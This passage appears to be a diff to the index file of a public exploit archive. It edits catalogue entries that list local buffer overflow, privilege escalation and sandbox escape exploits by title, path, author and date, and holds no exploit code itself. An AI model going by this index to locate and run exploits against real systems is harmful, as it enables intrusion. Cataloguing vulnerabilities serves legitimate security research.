Buffer Overflow (Metasploit)",2009-12-07,loneferret,windows,local,0 10353,platforms/windows/local/10353.pl,"Audio Workstation - '.pls' Local Buffer Overflow (SEH)",2009-09-24,germaya_x,windows,local,0 10359,platforms/windows/local/10359.py,"Audio Workstation 6.4.2.4.0 - '.pls' Universal Local Buffer Overflow",2009-12-09,mr_me,windows,local,0 -10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (1)",2009-12-09,dookie,windows,local,0 +10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit)",2009-12-09,dookie,windows,local,0 10371,platforms/windows/local/10371.pl,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (1)",2009-12-10,germaya_x,windows,local,0 -10373,platforms/windows/local/10373.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (1)",2009-12-10,"loneferret germaya_x",windows,local,0 +10373,platforms/windows/local/10373.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit)",2009-12-10,"loneferret germaya_x",windows,local,0 10374,platforms/windows/local/10374.pl,"Easy RM to MP3 Converter 2.7.3.700 - Exploit",2009-12-10,"Vinod Sharma",windows,local,0 10392,platforms/windows/local/10392.rb,"Millenium MP3 Studio 2.0 - '.pls' Universal Stack Overflow (Metasploit)",2009-12-11,dookie,windows,local,0 10396,platforms/linux/local/10396.pl,"Mozilla Codesighs - Memory Corruption (PoC)",2009-12-12,"Jeremy Brown",linux,local,0 @@ -6422,7 +6426,7 @@ id,file,description,date,author,platform,type,port 10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit)",2009-12-27,dijital1,windows,local,0 10745,platforms/windows/local/10745.c,"Mini-stream Ripper 3.0.1.1 - '.pls' Local Universal Buffer Overflow",2009-12-27,mr_me,windows,local,0 10747,platforms/windows/local/10747.py,"Mini-stream Ripper (Windows XP SP2/SP3) - Exploit",2009-12-27,dijital1,windows,local,0 -10748,platforms/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (1)",2009-12-27,dijital1,windows,local,0 +10748,platforms/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit)",2009-12-27,dijital1,windows,local,0 10759,platforms/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Stack Buffer Overflow",2009-12-28,corelanc0d3r,windows,local,0 10782,platforms/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Perl)",2009-12-29,jacky,windows,local,0 10786,platforms/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0 @@ -6799,7 +6803,6 @@ id,file,description,date,author,platform,type,port 16617,platforms/windows/local/16617.rb,"VUPlayer - '.m3u' Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16618,platforms/windows/local/16618.rb,"BlazeDVD 5.1 - PLF Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16619,platforms/windows/local/16619.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 -16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit)",2011-01-08,Metasploit,windows,local,0 16621,platforms/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local,0 16622,platforms/windows/local/16622.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 16623,platforms/windows/local/16623.rb,"Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 @@ -6809,7 +6812,7 @@ id,file,description,date,author,platform,type,port 16627,platforms/windows/local/16627.rb,"UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16629,platforms/windows/local/16629.rb,"VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local,0 -16631,platforms/windows/local/16631.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0 +16631,platforms/windows/local/16631.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Index Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0 16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16634,platforms/windows/local/16634.rb,"Free Download Manager 3.0 Build 844 - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 @@ -6821,8 +6824,7 @@ id,file,description,date,author,platform,type,port 16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN - '.DWB' Stack Buffer Overflow (Metasploit)",2010-04-05,Metasploit,windows,local,0 16645,platforms/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 -16648,platforms/windows/local/16648.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 -16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 +16648,platforms/windows/local/16648.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Cotent Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 16651,platforms/windows/local/16651.rb,"AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local,0 @@ -6832,7 +6834,6 @@ id,file,description,date,author,platform,type,port 16658,platforms/windows/local/16658.rb,"VUPlayer - '.cue' Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16659,platforms/aix/local/16659.rb,"Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)",2010-11-24,Metasploit,aix,local,0 16660,platforms/windows/local/16660.rb,"Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (MS11-006) (Metasploit)",2011-02-08,Metasploit,windows,local,0 -16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 16662,platforms/windows/local/16662.rb,"A-PDF WAV to MP3 1.0.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16663,platforms/windows/local/16663.rb,"S.O.M.P.L 1.0 Player - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 @@ -6847,14 +6848,13 @@ id,file,description,date,author,platform,type,port 16673,platforms/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16674,platforms/windows/local/16674.rb,"Adobe - Collab.collectEmailInfo() Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,local,0 -16676,platforms/windows/local/16676.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2)",2011-01-08,Metasploit,windows,local,0 16677,platforms/windows/local/16677.rb,"CA AntiVirus Engine - CAB Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16678,platforms/win_x86/local/16678.rb,"VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,local,0 16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,local,0 16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16681,platforms/windows/local/16681.rb,"Adobe - 'Collab.getIcon()' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript)(Metasploit)",2010-12-16,Metasploit,windows,local,0 -16683,platforms/windows/local/16683.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0 +16683,platforms/windows/local/16683.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' compiled Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0 16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 16686,platforms/windows/local/16686.rb,"Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)",2011-03-04,Metasploit,windows,local,0 16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 @@ -6903,7 +6903,7 @@ id,file,description,date,author,platform,type,port 17302,platforms/windows/local/17302.py,"Sonique 1.96 - '.m3u' Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0 17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing - Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0 17313,platforms/windows/local/17313.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Metasploit)",2011-05-22,Metasploit,windows,local,0 -17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (without egg-hunter) (Metasploit)",2011-05-27,"Alexey Sintsov",windows,local,0 +17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Without Egg-Hunter) (Metasploit)",2011-05-27,"Alexey Sintsov",windows,local,0 17362,platforms/windows/local/17362.cpp,"OpenDrive 1.3.141 - Local Password Disclosure",2011-06-04,"Glafkos Charalambous",windows,local,0 17364,platforms/windows/local/17364.py,"The KMPlayer 3.0.0.1440 - '.mp3' Buffer Overflow (Windows XP SP3 DEP Bypass)",2011-06-06,"dookie and ronin",windows,local,0 17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - '.mp3' Buffer Overflow (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0 @@ -6914,7 +6914,7 @@ id,file,description,date,author,platform,type,port 17459,platforms/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Privilege Escalation",2011-06-29,LiquidWorm,windows,local,0 17473,platforms/windows/local/17473.txt,"Adobe Reader X 10.0.0 < 10.0.1 - Atom Type Confusion Exploit",2011-07-03,Snake,windows,local,0 17474,platforms/windows/local/17474.txt,"Microsoft Office 2010 - '.RTF' Header Stack Overflow",2011-07-03,Snake,windows,local,0 -17486,platforms/multiple/local/17486.php,"PHP 5.3.6 - Buffer Overflow PoC (ROP)",2011-07-04,"Jonathan Salwan",multiple,local,0 +17486,platforms/multiple/local/17486.php,"PHP 5.3.6 - Buffer Overflow (ROP) (PoC)",2011-07-04,"Jonathan Salwan",multiple,local,0 17488,platforms/windows/local/17488.txt,"Adobe Reader 5.1 - XFDF Buffer Overflow (SEH)",2011-07-04,extraexploit,windows,local,0 17489,platforms/windows/local/17489.rb,"Word List Builder 1.0 - Buffer Overflow (Metasploit)",2011-07-04,"James Fitts",windows,local,0 17492,platforms/windows/local/17492.rb,"Wordtrainer 3.0 - '.ord' Buffer Overflow (Metasploit)",2011-07-05,"James Fitts",windows,local,0 @@ -7422,7 +7422,7 @@ id,file,description,date,author,platform,type,port 20213,platforms/aix/local/20213.txt,"AIX 4.2/4.3 - netstat -Z Statistic Clearing",2000-09-03,"alex medvedev",aix,local,0 20542,platforms/windows/local/20542.rb,"GlobalScape CuteZIP - Stack Buffer Overflow (Metasploit)",2012-08-15,Metasploit,windows,local,0 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Privilege Escalation",2000-06-24,"Stephen J. Friedl",sco,local,0 -20232,platforms/windows/local/20232.cpp,"Microsoft Windows Server 2000/NT 4 - DLL Search Path",2000-09-18,"Georgi Guninski",windows,local,0 +20232,platforms/windows/local/20232.cpp,"Microsoft Windows NT 4/2000 - DLL Search Path",2000-09-18,"Georgi Guninski",windows,local,0 20241,platforms/palm_os/local/20241.txt,"Palm OS 3.5.2 - Weak Encryption",2000-09-26,@stake,palm_os,local,0 20250,platforms/linux/local/20250.c,"LBL Traceroute 1.4 a5 - Heap Corruption (1)",2000-09-28,Dvorak,linux,local,0 20251,platforms/linux/local/20251.c,"LBL Traceroute 1.4 a5 - Heap Corruption (2)",2000-09-28,"Perry Harrington",linux,local,0 @@ -7629,7 +7629,7 @@ id,file,description,date,author,platform,type,port 21244,platforms/unix/local/21244.pl,"Tarantella Enterprise 3 - gunzip Race Condition",2002-02-08,"Larry Cashdollar",unix,local,0 21247,platforms/linux/local/21247.c,"BRU 17.0 - SetLicense Script Insecure Temporary File Symbolic Link",2002-01-26,"Andrew Griffiths",linux,local,0 21248,platforms/linux/local/21248.txt,"(Linux Kernel 2.4.17-8) User-Mode Linux - Memory Access Privilege Escalation",2000-08-25,"Andrew Griffiths",linux,local,0 -21258,platforms/linux/local/21258.bat,"Microsoft Windows Server 2000/NT 4 - NTFS File Hiding",2002-01-29,"Hans Somers",linux,local,0 +21258,platforms/linux/local/21258.bat,"Microsoft Windows NT 4/2000 - NTFS File Hiding",2002-01-29,"Hans Somers",linux,local,0 21259,platforms/linux/local/21259.java,"Sun Java Virtual Machine 1.2.2/1.3.1 - Segmentation Violation",2002-01-30,"Taeho Oh",linux,local,0 21280,platforms/linux/local/21280.c,"Hanterm 3.3 - Local Buffer Overflow (1)",2002-02-07,Xpl017Elz,linux,local,0 21281,platforms/linux/local/21281.c,"Hanterm 3.3 - Local Buffer Overflow (2)",2002-02-07,xperc,linux,local,0 @@ -7645,7 +7645,7 @@ id,file,description,date,author,platform,type,port 21331,platforms/windows/local/21331.py,"NCMedia Sound Editor Pro 7.5.1 - MRUList201202.dat File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",windows,local,0 21341,platforms/linux/local/21341.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (1)",2002-02-27,"the itch",linux,local,0 21342,platforms/linux/local/21342.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (2)",2002-02-27,"the itch",linux,local,0 -21344,platforms/windows/local/21344.txt,"Microsoft Windows Server 2000/NT 4.0 - Process Handle Local Privilege Elevation",2002-03-13,EliCZ,windows,local,0 +21344,platforms/windows/local/21344.txt,"Microsoft Windows NT 4/2000 - Process Handle Local Privilege Elevation",2002-03-13,EliCZ,windows,local,0 21347,platforms/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,php,local,0 21348,platforms/linux/local/21348.txt,"Webmin 0.x - Code Input Validation",2002-03-20,prophecy,linux,local,0 21351,platforms/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 - Weak Password Encryption",2002-03-22,c3rb3r,windows,local,0 @@ -7702,14 +7702,14 @@ id,file,description,date,author,platform,type,port 40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x86/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0 21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0 21683,platforms/linux/local/21683.c,"qmailadmin 1.0.x - Local Buffer Overflow",2002-08-06,"Thomas Cannon",linux,local,0 -21684,platforms/windows/local/21684.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local,0 -21685,platforms/windows/local/21685.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (2)",2002-08-06,"Oliver Lavery",windows,local,0 -21686,platforms/windows/local/21686.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (3)",2002-08-06,"Brett Moore",windows,local,0 -21687,platforms/windows/local/21687.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (4)",2002-08-06,"Brett Moore",windows,local,0 -21688,platforms/windows/local/21688.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (5)",2002-08-06,"Oliver Lavery",windows,local,0 -21689,platforms/windows/local/21689.c,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (6)",2002-08-06,"Brett Moore",windows,local,0 -21690,platforms/windows/local/21690.txt,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (7)",2002-08-06,"Ovidio Mallo",windows,local,0 -21691,platforms/windows/local/21691.txt,"Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,windows,local,0 +21684,platforms/windows/local/21684.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local,0 +21685,platforms/windows/local/21685.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (2)",2002-08-06,"Oliver Lavery",windows,local,0 +21686,platforms/windows/local/21686.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (3)",2002-08-06,"Brett Moore",windows,local,0 +21687,platforms/windows/local/21687.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (4)",2002-08-06,"Brett Moore",windows,local,0 +21688,platforms/windows/local/21688.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (5)",2002-08-06,"Oliver Lavery",windows,local,0 +21689,platforms/windows/local/21689.c,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (6)",2002-08-06,"Brett Moore",windows,local,0 +21690,platforms/windows/local/21690.txt,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (7)",2002-08-06,"Ovidio Mallo",windows,local,0 +21691,platforms/windows/local/21691.txt,"Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,windows,local,0 21700,platforms/linux/local/21700.c,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (1)",2002-08-10,"Gobbles Security",linux,local,0 21701,platforms/linux/local/21701.pl,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (2)",2002-08-10,"TESO Security",linux,local,0 21713,platforms/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass)",2012-10-03,b33f,windows,local,0 @@ -7752,8 +7752,8 @@ id,file,description,date,author,platform,type,port 21887,platforms/windows/local/21887.php,"PHP 5.3.4 Win Com Module - Com_sink Exploit",2012-10-11,fb1h2s,windows,local,0 21892,platforms/windows/local/21892.txt,"FileBound 6.2 - Privilege Escalation",2012-10-11,"Nathaniel Carew",windows,local,0 21904,platforms/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 - ERRPT Local Buffer Overflow",2003-04-16,watercloud,aix,local,0 -21922,platforms/windows/local/21922.c,"Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (1)",2002-10-09,Serus,windows,local,0 -21923,platforms/windows/local/21923.c,"Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (2)",2002-10-09,Serus,windows,local,0 +21922,platforms/windows/local/21922.c,"Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (1)",2002-10-09,Serus,windows,local,0 +21923,platforms/windows/local/21923.c,"Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (2)",2002-10-09,Serus,windows,local,0 21980,platforms/linux/local/21980.c,"Abuse 2.0 - Local Buffer Overflow",2002-11-01,Girish,linux,local,0 21988,platforms/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode SEH Exploit",2012-10-15,Dark-Puzzle,windows,local,0 21994,platforms/windows/local/21994.rb,"Microsoft Windows - Escalate Service Permissions Privilege Escalation (Metasploit)",2012-10-16,Metasploit,windows,local,0 @@ -7959,7 +7959,7 @@ id,file,description,date,author,platform,type,port 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Privilege Escalation",2004-04-06,"Ian Vitek",windows,local,0 23921,platforms/windows/local/23921.c,"Centrinity FirstClass Desktop Client 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0 40400,platforms/windows/local/40400.txt,"SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",windows,local,0 -23989,platforms/windows/local/23989.c,"Microsoft Windows Server 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,windows,local,0 +23989,platforms/windows/local/23989.c,"Microsoft Windows NT 4/2000 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,windows,local,0 23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg' Exploit",2013-01-09,"Debasish Mandal",windows,local,0 24014,platforms/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 - Nested File Manual Scan Bypass",2004-04-17,"Bipin Gautam",windows,local,0 24015,platforms/bsd/local/24015.c,"BSD-Games 2.x - Mille Local Save Game File Name Buffer Overrun",2004-04-17,N4rK07IX,bsd,local,0 @@ -7978,7 +7978,7 @@ id,file,description,date,author,platform,type,port 24207,platforms/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Exploit",2013-01-18,"Jon Bailey",windows,local,0 24210,platforms/hp-ux/local/24210.pl,"HP-UX 7-11 - Local X Font Server Buffer Overflow",2003-03-10,watercloud,hp-ux,local,0 24258,platforms/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Privilege Escalation",2013-01-20,LiquidWorm,windows,local,0 -24277,platforms/windows/local/24277.c,"Microsoft Windows Server 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)",2004-07-16,bkbll,windows,local,0 +24277,platforms/windows/local/24277.c,"Microsoft Windows NT 4/2000 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)",2004-07-16,bkbll,windows,local,0 24278,platforms/linux/local/24278.sh,"IM-Switch - Insecure Temporary File Handling Symbolic Link",2004-07-13,"SEKINE Tatsuo",linux,local,0 24293,platforms/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",sco,local,0 24335,platforms/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation",2004-07-30,"Juan Manuel Pascual Escribá",unix,local,0 @@ -8119,7 +8119,7 @@ id,file,description,date,author,platform,type,port 27296,platforms/windows/local/27296.rb,"Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005) (Metasploit)",2013-08-02,Metasploit,windows,local,0 27297,platforms/linux/local/27297.c,"Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation",2013-08-02,spender,linux,local,0 27316,platforms/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow (SEH)",2013-08-03,sagi-,windows,local,0 -27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0 +27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_parameters' Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0 27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 - mb_send_mail() Function Parameter Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0 40764,platforms/windows/local/40764.cs,"Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 40763,platforms/windows/local/40763.cs,"Microsoft Windows - VHDMP Arbitrary File Creation Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 @@ -8224,6 +8224,7 @@ id,file,description,date,author,platform,type,port 40522,platforms/windows/local/40522.txt,"InsOnSrv Asus InstantOn 2.3.1.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",windows,local,0 30464,platforms/linux/local/30464.c,"Generic Software Wrappers Toolkit 1.6.3 (GSWTK) - Race Condition Privilege Escalation",2007-08-09,"Robert N. M. Watson",linux,local,0 30468,platforms/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",windows,local,0 +30474,platforms/multiple/local/30474.rb,"Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)",2013-08-06,Metasploit,multiple,local,0 30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0 30484,platforms/bsd/local/30484.c,"Systrace - Multiple System Call Wrappers Concurrency Vulnerabilities",2007-08-09,"Robert N. M. Watson",bsd,local,0 30503,platforms/linux/local/30503.txt,"BlueCat Networks Adonis 5.0.2.8 - CLI Privilege Escalation",2007-08-16,forloop,linux,local,0 @@ -8302,7 +8303,7 @@ id,file,description,date,author,platform,type,port 32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 - Privilege Escalation",2009-03-10,"Sun Microsystems",linux,local,0 32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0 32884,platforms/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",android,local,0 -32891,platforms/windows/local/32891.txt,"Microsoft Windows Server 2003/2008/XP/Vista - WMI Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 +32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32893,platforms/windows/local/32893.txt,"Microsoft Windows Vista/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' and 'open_basedir' Restriction-Bypass",2009-04-10,"Maksymilian Arciemowicz",php,local,0 @@ -8335,7 +8336,7 @@ id,file,description,date,author,platform,type,port 33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0 33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0 40342,platforms/win_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",win_x86-64,local,0 -33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - addJavascriptInterface Exploit (Metasploit)",2014-06-17,Metasploit,arm,local,0 +33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - 'addJavascriptInterface' Exploit (Metasploit)",2014-06-17,Metasploit,arm,local,0 33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0 33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0 33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC)",2014-06-21,"Vitaly Nikolenko",linux,local,0 @@ -8428,7 +8429,6 @@ id,file,description,date,author,platform,type,port 35905,platforms/windows/local/35905.c,"Comodo Backup 4.4.0.0 - Null Pointer Dereference EOP",2015-01-26,"Parvez Anwar",windows,local,0 35983,platforms/windows/local/35983.rb,"Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004) (Metasploit)",2015-02-03,Metasploit,windows,local,0 35934,platforms/osx/local/35934.txt,"Apple Mac OSX < 